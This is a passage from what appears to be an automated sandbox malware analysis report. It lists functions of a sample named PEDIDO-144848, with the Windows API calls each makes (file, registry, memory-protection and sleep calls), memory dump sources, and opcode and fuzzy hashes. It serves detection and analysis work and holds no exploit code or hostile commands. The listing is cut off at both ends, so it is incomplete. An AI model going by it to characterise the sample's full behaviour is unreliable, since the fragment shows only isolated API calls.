                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: wsprintf
                                                        • String ID:
                                                        • API String ID: 2111968516-0
                                                        • Opcode ID: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                        • Instruction ID: cbf00d81cb97437f3a5b335f5c35441536f11fd869f9e222d526ef6a243a720c
                                                        • Opcode Fuzzy Hash: 4ba2856da63ff7f435db743ac2a14cc2248dd3629aba4a8dceb7604ea70bc87f
                                                        • Instruction Fuzzy Hash: 9521C970D0429ABEDF218B9885486AEBF749F01314F1445BFEC95B63D1C2BE8A81CF19
                                                        Function 00402695 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026B3
                                                          • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FilePointerwsprintf
                                                        • String ID:
                                                        • API String ID: 327478801-0
                                                        • Opcode ID: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                        • Instruction ID: fecccce0915ab20f046520e702d9d3c2ebd546ffbad39029680d96f2603726cc
                                                        • Opcode Fuzzy Hash: abf4405e99e4dcb85fe8fe58243fd46f792263ec105484f86c7cee990d7a89bb
                                                        • Instruction Fuzzy Hash: B8E01BB1B05115AFD701EB956A4987F7769DF40328F10443BF141F50D1C67E4D429B6D
                                                        Function 004022F2 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 0040232B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWrite
                                                        • String ID:
                                                        • API String ID: 390214022-0
                                                        • Opcode ID: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                        • Instruction ID: 5f6267e841dd840bf6295cbe1617e7a0042591bb1814ca2e8a4844537e2a2c78
                                                        • Opcode Fuzzy Hash: 6c1eb3e18aa1cf105a2872d21e97bfa3763926e12a5010dfe0d2da281f2b65f7
                                                        • Instruction Fuzzy Hash: 67E04F31B001246BD7307AB10F8E97F10999BC4304B39153ABA01B62C6EDBC4C414AB9
                                                        Function 0040171F Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: PathSearch
                                                        • String ID:
                                                        • API String ID: 2203818243-0
                                                        • Opcode ID: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                        • Instruction ID: e4e3c42305c0b2198e0aecdca264a5a1b937f2a52f25dfaad176198492f8ea82
                                                        • Opcode Fuzzy Hash: 6ee8a2cb6661bb696876ffa748e538e6724bcba4671d5e56d17f999e1d815b23
                                                        • Instruction Fuzzy Hash: CFE026B2304111AFE740DF68DE48EAA3B98DB10368F30453AF151F60C0E2BA9A41A769
                                                        Function 00402BD8 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,0000064F,00000000,00000022,00000000,?,?,?,00402383,00000002), ref: 00402C00
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                        • Instruction ID: 12eae925539b7dc367c8ab6fa63785f67f6a0dd6345a275e5017c2f2efb43849
                                                        • Opcode Fuzzy Hash: fdb8ee867dc8347cd902a818e27750adf9bf7bda53abb5245a0d02fd0d3a8952
                                                        • Instruction Fuzzy Hash: ADE0B676250108BEDB00EFA9EE4AE9977ECAB58740F108421B608E70A1C678E5508B69
                                                        Function 00405A8B Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403135,00000000,00000000,00402F82,000000FF,00000004,00000000,00000000,00000000), ref: 00405A9F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                        • Instruction ID: 3049aa00f6096361bf05a549768cb7fbda67778921cce1d2793645b00ea59393
                                                        • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                                        • Instruction Fuzzy Hash: 56E08C3260521ABBEF119E508C40EEB3B6CEB043A0F008933F914E2180E230E8219FE4
                                                        Function 00405ABA Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004030EB,00000000,007890F8,000000FF,007890F8,000000FF,000000FF,00000004,00000000), ref: 00405ACE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileWrite
                                                        • String ID:
                                                        • API String ID: 3934441357-0
                                                        • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction ID: 32d48f6e8b76b53ead5095efbfc7dc84fe3b04974c76bcad3a7819726962f715
                                                        • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                                        • Instruction Fuzzy Hash: CEE0B63261429AABDF109E659C40AAB7B6CFF05360F148533B915E6150E231E8219EA5
                                                        Function 1000270B Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 10002729
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115168409337.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000000.00000002.115168379839.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168440714.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.115168472087.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_10000000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                        • Instruction ID: 4f82052a8ee677216feeb46ba648c84afb962adc58c95b92ee0d34447feb5494
                                                        • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                                        • Instruction Fuzzy Hash: B5F09BF19092A0DEF360DF688CC4B063FE4E3983D5B03892AE358F6269EB7441448B19
                                                        Function 00402336 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402369
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileString
                                                        • String ID:
                                                        • API String ID: 1096422788-0
                                                        • Opcode ID: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                        • Instruction ID: 863d308e192ce4c0f66b0ae01519e0470cfafd3cecd099ef988cf845eccf6abb
                                                        • Opcode Fuzzy Hash: e46b05dc8f5ff29729b9ed40f267ec6ff0ae672f09ade1fc8e872b569ad31fa6
                                                        • Instruction Fuzzy Hash: D1E08630A04208BADB10AFA08F09EAD3A79AF41710F24003AF9507B0D1EAB84481DB2D
                                                        Function 0040159D Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                        • Instruction ID: 089d8403b4a3c67af6c4af196b8dedf915adbd4a042e4b2ee6fd832a67879694
                                                        • Opcode Fuzzy Hash: b1bfa589af0f93098282614436603590eccf1b584019d2a6df4a412e22152707
                                                        • Instruction Fuzzy Hash: 34D05B72704115DBDB10DBE5EB0869D77A0AB40364F304537D151F21D0D2BADA559719
                                                        Function 00403138 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC1,0002FFE4), ref: 00403146
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115151421592.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                        Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.115150545839.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150604876.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.115150635160.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
